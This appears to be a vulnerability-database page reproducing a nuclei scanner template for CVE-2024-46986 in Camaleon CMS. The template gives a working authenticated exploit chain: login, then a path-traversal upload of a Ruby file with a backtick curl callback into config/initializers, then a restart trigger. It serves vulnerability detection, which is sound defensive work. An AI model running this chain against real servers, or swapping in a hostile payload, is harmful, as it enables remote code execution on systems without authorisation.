Lucene search
K

Camaleon CMS < 2.8.1 Arbitrary File Write to RCE

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 58 Views

Camaleon CMS < 2.8.1 Arbitrary File Write to RCE. Allows authenticated users to write arbitrary files to the web server, leading to remote code execution (RCE)

Related
Refs
Code
id: CVE-2024-46986

info:
  name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
  impact: |
    Authenticated attackers can write arbitrary files to any location on the web server, potentially achieving remote code execution.
  remediation: |
    Update Camaleon CMS to version 2.8.1 or later.
  reference:
    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
    - https://owasp.org/www-community/attacks/Path_Traversal
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-46986
    cwe-id: CWE-22,CWE-74
    epss-score: 0.35461
    epss-percentile: 0.98253
    cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: tuzitio
    product: camaleon_cms
    shodan-query: title:"Camaleon CMS"
    fofa-query: title="Camaleon CMS"
  tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(location,"/admin/dashboard")'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
        Content-Type: text/x-ruby-script

        `curl {{interactsh-url}}`
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../config/initializers/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers:
      - type: word
        part: body
        words:
          - '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
        Content-Type: text/x-ruby-script

        {{randstr}}
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../tmp/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 4a0a0047304502202c6c563bc894cda7fc8df4e9c7273220b90bf849df2d93176b0467c47f24d3ec022100924b031c402fc712d4373f05459cf8c795b177f459820fb1aa665bc76b73d7d2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.9
EPSS0.35461
SSVC
58